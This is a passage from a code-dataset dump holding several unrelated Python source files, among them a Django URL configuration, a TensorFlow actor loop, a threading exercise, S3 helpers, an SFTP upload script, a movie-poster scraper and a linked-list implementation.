include('adminenviromentcate.urls')),\n path('adminsubject/', include('adminsubject.urls')),\n path('adminsubjectteacher/', include('adminsubjectteacher.urls')),\n path('adminsubjectpart/', include('adminsubjectpart.urls')),\n path('adminchapter/', include('adminchapter.urls')),\n path('adminlesson/', include('adminlesson.urls')),\n path('adminitem/', include('adminitem.urls')),\n path('adminactivitytype/', include('adminactivitytype.urls')),\n path('adminactivity/', include('adminactivity.urls')),\n path('adminactivitysubmittion/', include('adminactivitysubmittion.urls')),\n path('adminforum/', include('adminforum.urls')),\n path('adminprojectshare/', include('adminprojectshare.urls')),\n path('adminnews/', include('adminnews.urls')),\n path('admincompetition/', include('admincompetition.urls')),\n path('admincompetitionsubmittion/', include('admincompetitionsubmittion.urls')),\n path('adminenrollment/', include('adminenrollment.urls')),\n path('adminsubjectlike/', include('adminsubjectlike.urls')),\n path('adminlessonreply/', include('adminlessonreply.urls')),\n path('adminactivityreply/', include('adminactivityreply.urls')),\n path('adminactivitysubmittionreply/', include('adminactivitysubmittionreply.urls')),\n path('admintracking/', include('admintracking.urls')),\n path('adminforumlike/', include('adminforumlike.urls')),\n path('adminforumreply/', include('adminforumreply.urls')),\n path('adminnewsreply/', include('adminnewsreply.urls')),\n path('adminprojectsharelike/', include('adminprojectsharelike.urls')),\n path('adminprojectsharereply/', include('adminprojectsharereply.urls')),\n path('admincompetitionsubmittionlike/', include('admincompetitionsubmittionlike.urls')),\n path('admincompetitionsubmittionreply/', include('admincompetitionsubmittionreply.urls')),\n path('adminuserrank/', include('adminuserrank.urls')),\n path('admincontact/', include('admincontact.urls')),\n path('adminfastchat/', include('adminfastchat.urls')),\n path('admingametype/', include('admingametype.urls')),\n path('admingamerate/', include('admingamerate.urls')),\n path('admingame/', include('admingame.urls')),\n]\n\nfrom 
django.conf import settings\nfrom django.conf.urls.static import static\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"CourseProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"508380097","text":"import tensorflow as tf\nimport sonnet as snt\nnest = tf.contrib.framework.nest\nimport collections\nimport sys\nimport numpy as np\n\n# Structure to be sent from actors to learner.\nActorOutput = collections.namedtuple(\n 'ActorOutput', \n [\n 'env_outputs',\n 'agent_outputs'\n ]\n)\n\ndef build_actor(agent, env, FLAGS):\n \"\"\"Builds the actor loop.\"\"\"\n # Initial values.\n initial_env_output, initial_env_state = env.initial()\n initial_action = tf.zeros(FLAGS.asset_num+1, dtype=tf.float32)\n\n dummy_agent_output = agent((\n tf.expand_dims(initial_action,0),\n nest.map_structure(\n lambda t: tf.expand_dims(t, 0),\n initial_env_output\n )\n ))\n\n initial_agent_output = nest.map_structure(\n lambda t: tf.zeros(t.shape, t.dtype),\n dummy_agent_output\n )\n\n # All state that needs to persist across training iterations. This includes\n # the last environment output and last agent output. These\n # variables should never go on the parameter servers.\n def create_state(t):\n # Creates a unique variable scope to ensure the variable name is unique.\n with tf.variable_scope(None, default_name='state'):\n return tf.get_local_variable(t.op.name, initializer=t, use_resource=True)\n\n persistent_state = nest.map_structure(\n create_state,\n (\n initial_env_state,\n initial_env_output, \n initial_agent_output\n )\n )\n\n # Run the unroll. `read_value()` is \n # needed to make sure later usage will\n # return the first values and not a new\n # snapshot of the variables.\n first_values = nest.map_structure(\n lambda v: v.read_value(), \n persistent_state\n )\n\n first_env_state, first_env_output, first_agent_output = first_values\n\n def step(input_, unused_i):\n env_state, env_output, agent_output = input_\n\n batched_env_output = nest.map_structure(\n lambda t: tf.expand_dims(t, 0),\n env_output\n )\n\n # TODO update\n agent_output = agent((\n agent_output.action, \n batched_env_output\n ))\n\n # TODO remove first element of array in tensor\n env_output, env_state = env.step(\n agent_output[0], \n env_state\n )\n\n return env_state, env_output, agent_output\n\n output = tf.scan(\n step, \n tf.range(FLAGS.unroll_length), \n first_values\n )\n\n _, env_outputs, agent_outputs = output\n\n # Update persistent state with the\n # last output from the loop.\n assign_ops = nest.map_structure(\n lambda v, t: v.assign(t[-1]),\n persistent_state, \n output\n )\n\n # The control dependency ensures that the final agent and environment states\n # and outputs are stored in `persistent_state` (to initialize next unroll).\n with tf.control_dependencies(nest.flatten(assign_ops)):\n # Remove the batch dimension from the agent output.\n first_agent_output = nest.map_structure(\n lambda t: t[0], \n first_agent_output\n )\n\n agent_outputs = nest.map_structure(\n lambda t: t[:, 0], \n agent_outputs\n )\n\n # Concatenate first output and the unroll along the time dimension.\n full_agent_outputs, full_env_outputs = nest.map_structure(\n lambda first, rest: tf.concat([[first], rest], 0),\n (first_agent_output, first_env_output),\n (\n agent_outputs, \n env_outputs\n )\n )\n\n output = ActorOutput(\n env_outputs=full_env_outputs, \n 
agent_outputs=full_agent_outputs\n )\n\n # No backpropagation should be done here.\n return nest.map_structure(\n tf.stop_gradient, \n output\n )\n","sub_path":"agent/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379693010","text":"import random\nimport threading\nimport time\nimport logging\n\nlogging.basicConfig(format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\nsemaphoreAgente = threading.Semaphore(1)\n\ncantiadPuestasAgente1 = 12\ncantiadPuestasAgente2 = 11\ncantiadPuestasAgente3 = 10\npapel = []\nfosforos = []\ntabaco = []\n\n\ndef agentePapelYFosforos():\n global papel, fosforos, cantiadPuestasAgente1 \n while cantiadPuestasAgente1 > 0:\n semaphoreAgente.acquire()\n cantiadPuestasAgente1-=1\n papel.append(1)\n fosforos.append(1)\n semaphoreAgente.release()\n\ndef agentePapelYTabaco():\n global papel, tabaco, cantiadPuestasAgente2\n while cantiadPuestasAgente2 > 0:\n semaphoreAgente.acquire()\n cantiadPuestasAgente2-=1\n papel.append(1)\n tabaco.append(1)\n semaphoreAgente.release()\n\ndef agenteFosforosYTabaco():\n global tabaco, fosforos, cantiadPuestasAgente3\n while cantiadPuestasAgente3 > 0:\n semaphoreAgente.acquire()\n cantiadPuestasAgente3-=1\n fosforos.append(1)\n tabaco.append(1)\n semaphoreAgente.release()\n\n \n \n\ndef fumadorConPapel():\n while True:\n global fosforos\n global tabaco\n if len(fosforos) > 0 and len(tabaco) > 0: # if there are matches and tobacco on the table\n # TAKE THE CIGARETTE INGREDIENTS\n fosforos.pop()\n tabaco.pop() # take them\n \n logging.info(f'Fumador con Papel: Armando y fumando cigarrillo') # roll a cigarette and smoke: can be simulated with a sleep\n time.sleep(1)\n # call the agent again so it restocks the table with two random items\n \n \n \n \n \n \n\ndef fumadorConFosforos():\n while True:\n global papel\n global tabaco\n if len(papel) > 0 and len(tabaco) > 0: # if there is paper and tobacco on the table\n # TAKE THE CIGARETTE INGREDIENTS\n papel.pop() # take them\n tabaco.pop() # take them\n logging.info(f'Fumador con Fosforos: Armando y fumando cigarrillo') # roll a cigarette and smoke: can be simulated with a sleep\n time.sleep(1)\n # call the agent again so it restocks the table with two random items\n \n \n \n \n \n\ndef fumadorConTabaco():\n while True:\n global papel\n global fosforos\n if len(papel) > 0 and len(fosforos) > 0: # if there are matches and paper on the table\n # TAKE THE CIGARETTE INGREDIENTS\n papel.pop() # take them\n fosforos.pop() # take them\n logging.info(f'Fumador con Tabaco: Armando y fumando cigarrillo') # roll a cigarette and smoke: can be simulated with a sleep\n time.sleep(1)\n # call the agent again so it restocks the table with two random items\n \n \n \n \n \n\n\nagente1Hilo = threading.Thread(target=agentePapelYFosforos)\nagente2Hilo = threading.Thread(target=agentePapelYTabaco)\nagente3Hilo = threading.Thread(target=agenteFosforosYTabaco)\nfumadorConPapelHilo = threading.Thread(target=fumadorConPapel)\nfumadorConFosforosHilo = threading.Thread(target=fumadorConFosforos)\nfumadorConTabacoHilo = 
threading.Thread(target=fumadorConTabaco)\n\nagente1Hilo.start()\nagente2Hilo.start()\nagente3Hilo.start()\nfumadorConPapelHilo.start()\nfumadorConFosforosHilo.start()\nfumadorConTabacoHilo.start()","sub_path":"fumadoresConVariantes_2.py","file_name":"fumadoresConVariantes_2.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135722253","text":"import os\n\ndef getLibs(rootdir):\n libs = []\n for subdir, dirs, files in os.walk(rootdir):\n for file in files:\n libs.append(os.path.join(subdir, file)) \n return libs\n\n\ndef file_get_contents(filename):\n with open(filename) as f:\n return f.read()\n\n\ndef writeFile(file, content):\n\tf = open(file, \"w\")\n\tf.write(content)\n\tf.close()\n\ndef updateNamespace(file):\n\tcontent = file_get_contents(file)\n\tcontent = content.replace(\"Swagger\\\\Client\", \"IMN\\\\Swagger\\\\Client\")\n\twriteFile(file,content)\n\n\ndef fixSerializerBug(currDir):\n\tfile = currDir + \"/lib/ObjectSerializer.php\"\n\tcontent = file_get_contents(file)\n\tcontent = content.replace(\"$discriminator = $class::DISCRIMINATOR;\", \"$discriminator = null;\\n if(\\defined($class.'::DISCRIMINATOR')) {\\n $discriminator = $class::DISCRIMINATOR;\\n }\")\n\tcontent = content.replace(\"foreach ($instance::swaggerTypes() as $property => $type) {\", \"if(!\\method_exists($instance, 'swaggerTypes')) {\\n return $instance;\\n }\\n foreach ($instance::swaggerTypes() as $property => $type) {\")\n\twriteFile(file,content)\n\n\n\nrootdir = os.getcwd()\nfixSerializerBug(rootdir)\nlibs = getLibs(rootdir)\nfor lib in libs:\n\tprint(lib)\n\tupdateNamespace(lib)\n\n","sub_path":"unify.py","file_name":"unify.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"118041393","text":"import importlib\nimport os\nimport sys\nstderr = sys.stderr\nsys.stderr = open(os.devnull, 'w')\nfrom keras import models\nsys.stderr = stderr\nfrom functools import lru_cache\nfrom common_utils import S3Util\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom common_utils.MLLogger import MLLogging\nfrom filelock import FileLock\nfrom threading import Lock\n\ns3Config= S3Util.S3Configuration()\nlogger=MLLogging.getLog()\n\ndef parseS3filePath(s3FilePath):\n \"\"\"\n Parse the S3 file Path and extract S3 Bucket name and S3 file location.\n s3FilePath Convention: /s3-/\n If it is not parseable it will return the as is s3FilePath as the localFilePath(assuming the string is the S3 object key) and None as the bucketName\n\n :param s3FilePath: the Complete File Path Location including S3 bucket and the file with directory location\n\n :return: Splits the string to get bucket name and s3 file location according to the convention\n \"\"\"\n bucketName=None\n localFilePath=None\n if s3FilePath.startswith(\"/s3-\"):\n localFilePath= s3FilePath[s3FilePath[1:].index(\"/\") + 2:]\n bucketName= s3FilePath[:s3FilePath[1:].index(\"/\") + 1][1:]\n elif s3FilePath.startswith(\"s3-\"):\n localFilePath = s3FilePath[s3FilePath.index(\"/\") + 1:]\n bucketName = s3FilePath[:s3FilePath.index(\"/\")]\n else:\n localFilePath=s3FilePath\n return bucketName,localFilePath\n\ndef makeDirectories(localFileLocation):\n \"\"\"\n Makes directories in the location of file prior to file creation\n [FORMAT: 'folder1/folder2/filename']\n\n :param localFileLocation: The location of file where the directories are to be created prior to file 
creation\n\n :return: None\n \"\"\"\n try:\n localFilePath = localFileLocation[:localFileLocation.rindex(\"/\")]\n if not os.path.exists(localFilePath):\n os.makedirs(localFilePath)\n except FileExistsError:\n logger.debug(\"Folders already exist\")\n pass\n\ndef fetchFileFromS3viaLocalApi(s3FullPath,s3Direct=False):\n \"\"\"\n Takes s3FullPath, downloads the file, and returns the localFileLocation\n\n :param s3FullPath: S3 file location to download\n\n :return: localFileLocation of the downloaded file\n \"\"\"\n try:\n s3util = S3Util.S3LocalUtility()\n bucketName, s3filePath = parseS3filePath(s3FullPath)\n localFileLocation = s3util.s3Config.s3_local_folder_path + s3filePath\n logger.info(localFileLocation)\n if os.path.isfile(localFileLocation) and s3Direct is False:\n return localFileLocation\n if bucketName is None:\n raise FileNotFoundError(\"Bucket not well defined according to format and no file was found in local file system\"+str(localFileLocation))\n makeDirectories(localFileLocation)\n with FileLock(str(localFileLocation)+\".lock\"):\n with Lock():\n if not os.path.isfile(localFileLocation) or s3Direct is True:\n logger.info(\"Downloading file from S3: Bucket: \" + str(bucketName) + \" S3 file path: \" + str(s3filePath) + \" via Local API\")\n s3util.downloadFileFromS3(s3filePath, localFileLocation, bucketName)\n return localFileLocation\n except Exception as e:\n msg = \"Exception While downloading file from S3 Utility: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n@lru_cache(maxsize=20)\ndef load_pipeline_cache(s3FullFilePath):\n \"\"\"\n\n Load the file into memory using an LRU cache of maxsize, deriving the location by appending the relative S3 file path to the local S3 storage path\n\n :param s3FullFilePath: S3 file location for the model\n\n :return: Pickle Object\n \"\"\"\n try:\n bucketName, s3FilePath = parseS3filePath(s3FullFilePath)\n localFileLocation = s3Config.s3_local_folder_path + s3FilePath\n return joblib.load(localFileLocation)\n except Exception as e:\n msg = \"Exception While loading the model from a file: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef load_h5_file(s3FullFilePath):\n \"\"\"\n Load the Keras-specific h5 model file from the local file system\n\n :param s3FullFilePath: S3 file location for the model\n\n :return: keras model file\n \"\"\"\n try:\n bucketName, s3FilePath = parseS3filePath(s3FullFilePath)\n localFileLocation = s3Config.s3_local_folder_path + s3FilePath\n return models.load_model(localFileLocation)\n except Exception as e:\n msg = \"Exception While loading the keras model configs from a h5 file: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef readCsvFromS3(s3FullPath,s3Direct=True,**kwargs):\n \"\"\"\n Read a csv file from S3 given the S3 file path\n\n :param s3FullPath: csv S3 file path\n\n :param s3Direct: if True always downloads from S3, else searches in local and returns if found\n\n :param kwargs: arguments to read_csv\n\n :return: csv file\n \"\"\"\n try:\n localFileLocation=fetchFileFromS3viaLocalApi(s3FullPath,s3Direct=s3Direct)\n return pd.read_csv(localFileLocation,**kwargs)\n except Exception as e:\n msg = \"Exception While reading csv file from S3: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef saveDftoS3(df, s3FullPath,**kwargs):\n \"\"\"\n Saves a csv file in S3\n\n :param df: Dataframe to save to S3\n\n :param s3FullPath: S3 path to save the 
csv\n\n :param kwargs: arguments to save csv\n\n :return:\n \"\"\"\n try:\n s3util = S3Util.S3LocalUtility()\n bucketName, s3filePath = parseS3filePath(s3FullPath)\n localFileLocation = s3util.s3Config.s3_local_folder_path + s3filePath\n makeDirectories(localFileLocation)\n df.to_csv(localFileLocation,**kwargs)\n s3util.uploadFileToS3(localFileLocation, s3filePath, bucketName)\n except Exception as e:\n msg = \"Exception While saving dataframe to csv file and uploading to S3: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\ndef readPickleFromS3(s3FullPath,s3Direct=True,**kwargs):\n \"\"\"\n Read pickle file from S3\n\n :param s3FullPath: S3 path to read pickle from\n\n :param s3Direct: if True always downloads from S3, else searches in local and returns if found\n\n :param kwargs: arguments to joblib.load\n\n :return: deserialized pickle object\n \"\"\"\n try:\n localFileLocation = fetchFileFromS3viaLocalApi(s3FullPath,s3Direct=s3Direct)\n return joblib.load(localFileLocation,**kwargs)\n except Exception as e:\n msg = \"Exception While reading pickle file from S3: \" + str(type(e).__name__) + \" \" + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef checkIfS3FileExist(s3FullPath):\n \"\"\"\n Check if the S3 file exists or not\n\n :param s3FullPath: S3 file path\n\n :return: True/False\n \"\"\"\n s3util = S3Util.S3LocalUtility()\n bucketName, s3filePath = parseS3filePath(s3FullPath)\n return s3util.ifS3FileExist(s3filePath,bucketName)\n\ndef getValFromDict(name, data):\n \"\"\"\n Get the value for the key from a given dictionary and raise custom exceptions if not found\n\n :param name: key to search\n\n :param data: Dictionary to search from\n\n :return: value for the given search key\n \"\"\"\n if name in data and data[name] is not None:\n return data[name]\n elif name not in data:\n raise KeyError(str(name)+\" is not defined in the request parameter\")\n elif data[name] is None:\n raise TypeError(str(name)+\" cannot be None type\")\n\ndef loadDataFramesFromDict(fileDict):\n \"\"\"\n Load the dataframes from a given dictionary of file paths\n\n :param fileDict: {key: 'filepath'}\n\n :return:{key: file}\n \"\"\"\n try:\n dfs={}\n for key in fileDict.keys():\n dfs[key]= pd.read_csv(fileDict[key])\n return dfs\n except Exception as e:\n msg =\"Unable to load csv file(s) into dataframes: \" + str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef loadDataFramesFromList(filePaths):\n \"\"\"\n Load Dataframes from list\n\n :param filePaths: list of file paths\n\n :return: list of files\n \"\"\"\n try:\n dfs = []\n for i in filePaths:\n df = pd.read_csv(i)\n dfs.append(df)\n return dfs\n except Exception as e:\n msg=\"Unable to load csv file(s) into dataframes: \"+str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef moduleClassFunctionInvoke(moduleClassFunctionPath, *arguments):\n \"\"\"\n Return a function call dynamically from a string function path.\n It applies reflection to load the function from the given class and module from a string\n\n :param moduleClassFunctionPath: full path of the module-class-function\n\n :param arguments: arguments to pass to the function\n\n :return: function invocation with arguments\n \"\"\"\n try:\n extractPath=moduleClassFunctionPath.rsplit('.', 2)\n module_name,py_class_name,function_name=extractPath[0],extractPath[1],extractPath[2]\n module = importlib.import_module(module_name)\n py_class = getattr(module, py_class_name)()\n return getattr(py_class, 
function_name)(*arguments)\n except Exception as e:\n msg=\"Problem in invocation function: \"+str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)\n\n\ndef moduleClassType(moduleClassFunctionPath):\n \"\"\"\n Returns the type of a function dynamically from a string function path.\n\n :param moduleClassFunctionPath: full path of the module-class-function\n\n :return: type of the invoked function\n \"\"\"\n try:\n extractPath=moduleClassFunctionPath.rsplit('.', 2)\n module_name,py_class_name,function_name=extractPath[0],extractPath[1],extractPath[2]\n module = importlib.import_module(module_name)\n py_class = getattr(module, py_class_name)()\n return type(py_class)\n except Exception as e:\n msg=\"Problem in invocation function (Class checking failed): \"+str(type(e).__name__) + str(e)\n logger.error(msg)\n raise Exception(msg)","sub_path":"common_utility/build/lib/common_utils/ServiceHelper.py","file_name":"ServiceHelper.py","file_ext":"py","file_size_in_byte":10269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"347479241","text":"#!/usr/bin/env python2\nfrom operator import attrgetter\nfrom plyj.model.modifier import BasicModifier\nfrom plyj.model.name import Name\nfrom plyj.model.source_element import Declaration, Modifier\nfrom plyj.model.type import Type, TypeParameter\nfrom plyj.utility import serialize_type_parameters, serialize_body, \\\n serialize_extends, serialize_modifiers\n\n\nclass InterfaceDeclaration(Declaration):\n name = property(attrgetter(\"_name\"))\n modifiers = property(attrgetter(\"_modifiers\"))\n extends = property(attrgetter(\"_extends\"))\n type_parameters = property(attrgetter(\"_type_parameters\"))\n body = property(attrgetter(\"_body\"))\n\n def __init__(self, name, modifiers=None, extends=None,\n type_parameters=None, body=None):\n super(InterfaceDeclaration, self).__init__()\n self._fields = ['name', 'modifiers', 'extends', 'type_parameters',\n 'body']\n\n self._name = None\n self._modifiers = None\n self._extends = None\n self._type_parameters = None\n self._body = None\n\n self.name = name\n self.modifiers = modifiers\n self.extends = extends\n self.type_parameters = type_parameters\n self.body = body\n\n @name.setter\n def name(self, name):\n self._name = Name.ensure(name, True)\n\n @modifiers.setter\n def modifiers(self, modifiers):\n self._modifiers = self._assert_list(modifiers, Modifier,\n BasicModifier.ensure_modifier)\n\n @extends.setter\n def extends(self, extends):\n # Deal with people who put a string literal as the extends parameter.\n if isinstance(extends, str):\n extends = [Type(extends)]\n extends = self._alter_tokens(\"extends\", extends)\n self._extends = self._assert_list_ensure(extends, Type)\n\n @type_parameters.setter\n def type_parameters(self, type_parameters):\n self._type_parameters = self._assert_list(type_parameters,\n TypeParameter)\n\n @body.setter\n def body(self, body):\n body = self._alter_tokens(\"body\", body)\n self._body = self._assert_list(body, Declaration)\n\n def serialize(self):\n return \"{}interface {}{} {}{}\".format(\n serialize_modifiers(self.modifiers),\n self.name.serialize(),\n serialize_type_parameters(self.type_parameters),\n serialize_extends(self.extends),\n serialize_body(self.body)\n )","sub_path":"plyj/model/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"352330642","text":"#!/usr/bin/env python\n# _*_coding:utf-8_*_\n\nimport paramiko\n\nprivate_key_path = '/root/.ssh/id_rsa'\nkey = paramiko.RSAKey.from_private_key_file(private_key_path)\n\nt = paramiko.Transport(('192.168.2.23', 22))\nt.connect(username='root', pkey=key)\n\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put('/tmp/test1.txt', '/tmp/test1.txt')\nsftp.put('/tmp/test2.txt', '/tmp/test2.txt')\n\nt.close()","sub_path":"learn/day06/paramiko_manager/ssh_ftp_upload.py","file_name":"ssh_ftp_upload.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"412742760","text":"# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\n# 운영체제에서 제공하는 기본적인 기능을 활용할 수 있는\r\n# 함수를 제공하는 모듈\r\nimport os\r\n\r\ntry :\r\n if not os.path.isdir('./download'):\r\n os.makedirs(os.path.join('./download'))\r\nexcept :\r\n print('Failed to create directory.')\r\n\r\nurl = 'https://movie.naver.com/movie/sdb/rank/rmovie.nhn'\r\nsession = requests.Session()\r\nhtml = session.get(url).text\r\n\r\nsoup = bs(html, 'html.parser')\r\n#print(soup)\r\n\r\nmovies = soup.find_all(name='div',\r\n attrs={'class':'tit3'},\r\n limit=10)\r\n#print(\"COUNT : \", len(movies))\r\n\r\nfor i, movie in enumerate(movies) : \r\n print(f'{i+1} : {movie.a.text}')\r\n \r\n # 링크 정보 추출을 위한 A태그 정보를 추출\r\n tag_a = movie.a\r\n # 이미지 파일의 이름을 지정하기 위한 텍스트 정보 추출\r\n movie_title = str(tag_a.text).replace(':', '_') \r\n fname_image = os.path.join('./download/', movie_title + '.jpg')\r\n print('{0} : {1}'.format(i+1, fname_image))\r\n \r\n # 영화정보 페이지의 URL 정보를 저장하는 변수\r\n movie_info_page_url = 'https://movie.naver.com' + tag_a.attrs['href']\r\n #print('{0} : {1}'.format(i+1, movie_info_page_url))\r\n\r\n # 영화정보 페이지에 접근하여, HTML 내용을 추출한 후,\r\n # BeautifulSoup 객체를 생성\r\n movie_info_html = session.get(movie_info_page_url).text\r\n movie_info_soup = bs(movie_info_html, 'html.parser')\r\n\r\n movie_poster_tag = movie_info_soup.find_all(\r\n name='div', attrs={'class':'poster'})[1]\r\n #print(len(movie_poster_tag))\r\n #print(movie_poster_tag)\r\n\r\n movie_poster_img_tag = movie_poster_tag.img\r\n img_url = movie_poster_img_tag.attrs['src'].split('?')[0]\r\n print(img_url)\r\n \r\n # 이미지 파일 다운로드\r\n content = session.get(img_url).content\r\n with open(fname_image, 'wb') as f:\r\n f.write(content)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_10/crawling/crawling_download.py","file_name":"crawling_download.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"37230542","text":"\nimport collections\n\ndef aplatir(conteneurs):\n tab = []\n for conteneur in conteneurs:\n if isinstance(conteneur, collections.Iterable):\n for cont in conteneur:\n tab.append(cont)\n else:\n tab.append(conteneur)\n return tab\n\n#print(aplatir([(1,)]))\n\n#print(aplatir(([1],)) )\n\n#print(aplatir([ (0, 6, 2),[1, ('a', 4), 5]]))\n\ndef aplatir2(conteneurs):\n return [cont for conteneur in conteneurs if isinstance(conteneur, collections.Iterable) for cont in conteneur ]\n\n#print(aplatir2([ (0, 6, 2),[1, ('a', 4), 5]]))\n#print(aplatir2([(1,)])) \n#print(aplatir( ( (1, [2, 3]), [], 'a',['b', 'c'])))\n#print(aplatir2([ (0, 6, 2),[1, ('a', 4), 5]]))\n\ndef alternat(c1, c2):\n tabzips= list(zip (c1,c2))\n return [z for tabzip in tabzips if isinstance(tabzip, collections.Iterable) for z in tabzip] \n\n#print(alternat( 
(1, 2), ('a', 'b')))\n#print(alternat((1, 2, 3),('a', 'b', 'c')))\n\ndef intersect(A, B):\n    tab = []\n    for a in A:\n        ax, ay = a\n        for b in B:\n            bx,by = b\n            if bx == ax:\n                tab.append(by)\n                tab.append(ay)\n    \n    return set(tab)\n\n    \n    #return {x for a in A for b in B if a[0] == b[0] for x in (b[1], a[1])}\n\nprint(\n    { (8, 'huit'),\n      (10, 'dixA'),\n      (12, 'douze')},\n    { (5, 'cinq'),\n      (10, 'dixB'),\n      (15, 'quinze')}) \n\nprint(intersect(\n    { (8, 'huit'),\n      (10, 'dixA'),\n      (12, 'douze')},\n    { (5, 'cinq'),\n      (10, 'dixB'),\n      (15, 'quinze')}) )\n
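\n# Expected result of the intersect call above (hypothetical run; set order may\n# vary): {'dixB', 'dixA'} -- 10 is the only key present in both sets, so the\n# labels attached to it on each side are collected.\n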
\n","sub_path":"S5/S58.py","file_name":"S58.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"630879757","text":"# Node class\nclass Node:\n\n    # Function to initialise the node object\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\n\n# Linked List class contains a Node object\nclass LinkedList:\n\n    # Function to initialize head\n    def __init__(self):\n        self.head = None\n\n\n    def push(self, new_data):\n\n        # 1 & 2: Allocate the Node & Put in the data\n        new_node = Node(new_data)\n\n        # 3. Make next of new Node as head\n        new_node.next = self.head\n\n        # 4. Move the head to point to new Node\n        self.head = new_node\n\n\n    # This function is in LinkedList class. Inserts a\n    # new node after the given prev_node. This method is\n    # defined inside LinkedList class shown above\n    def insertAfter(self, prev_node, new_data):\n\n        # 1. check if the given prev_node exists\n        if prev_node is None:\n            print(\"The given previous node must be in the LinkedList.\")\n            return\n\n        # 2. create new node & Put in the data\n        new_node = Node(new_data)\n\n        # 4. Make next of new Node as next of prev_node\n        new_node.next = prev_node.next\n\n        # 5. make next of prev_node as new_node\n        prev_node.next = new_node\n\n\n    # This function is defined in Linked List class\n    # Appends a new node at the end. This method is\n    # defined inside LinkedList class shown above\n    def append(self, new_data):\n\n        # 1. Create a new node\n        # 2. Put in the data\n        # 3. Set next as None\n        new_node = Node(new_data)\n\n        # 4. If the Linked List is empty, then make the new node as head\n        if self.head is None:\n            self.head = new_node\n            return\n\n        # 5. Else traverse till the last node\n        last = self.head\n        while (last.next):\n            last = last.next\n\n        # 6. Change the next of last node\n        last.next = new_node\n\n    def getCount(self):\n        temp = self.head\n        count = 0\n\n        while (temp):\n            count += 1\n            temp = temp.next\n        return count\n\n    # Given a reference to the head of a list and a key,\n    # delete the first occurrence of key in linked list\n    def deleteNode(self, key):\n\n        # Store head node\n        temp = self.head\n\n        # If head node itself holds the key to be deleted\n        if (temp is not None):\n            if (temp.data == key):\n                self.head = temp.next\n                temp = None\n                return\n\n        # Search for the key to be deleted, keep track of the\n        # previous node as we need to change 'prev.next'\n        while(temp is not None):\n            if temp.data == key:\n                break\n            prev = temp\n            temp = temp.next\n\n        # if key was not present in linked list\n        if(temp == None):\n            return\n\n        # Unlink the node from linked list\n        prev.next = temp.next\n\n        temp = None\n\n    # Given a reference to the head of a list\n    # and a position, delete the node at a given position\n    def deleteNodeAtPosition(self, position):\n\n        # If linked list is empty\n        if self.head == None:\n            return\n\n        # Store head node\n        temp = self.head\n\n        # If head needs to be removed\n        if position == 0:\n            self.head = temp.next\n            temp = None\n            return\n\n        # Find previous node of the node to be deleted\n        for i in range(position - 1):\n            temp = temp.next\n            if temp is None:\n                break\n\n        # If position is more than number of nodes\n        if temp is None:\n            return\n        if temp.next is None:\n            return\n\n        # Node temp.next is the node to be deleted\n        # store pointer to the next of node to be deleted\n        next = temp.next.next\n\n        # Unlink the node from linked list\n        temp.next = next\n\n    # Utility function to print the linked list\n    def printList(self):\n        temp = self.head\n        while (temp):\n            print(temp.data)\n            temp = temp.next\n\n\n\nif __name__=='__main__':\n\n    # Start with the empty list\n    llist = LinkedList()\n\n    llist.append(6)\n    llist.push(7)\n    llist.push(1)\n    llist.append(4)\n    llist.insertAfter(llist.head.next, 8)\n\n    print(\"Created linked list is:\")\n    llist.printList()\n    print(\"the length of this LL is: \", llist.getCount())\n\n    llist.deleteNode(7)\n    print(\"\\nLinked List after Deletion of 7:\")\n    llist.printList()\n    llist.deleteNodeAtPosition(2)\n    print(\"\\nLinked List after Deletion of the node in position 2:\")\n    llist.printList()\n","sub_path":"Data_Structures/python/Linked_lists/Linked_lists.py","file_name":"Linked_lists.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"274150584","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: 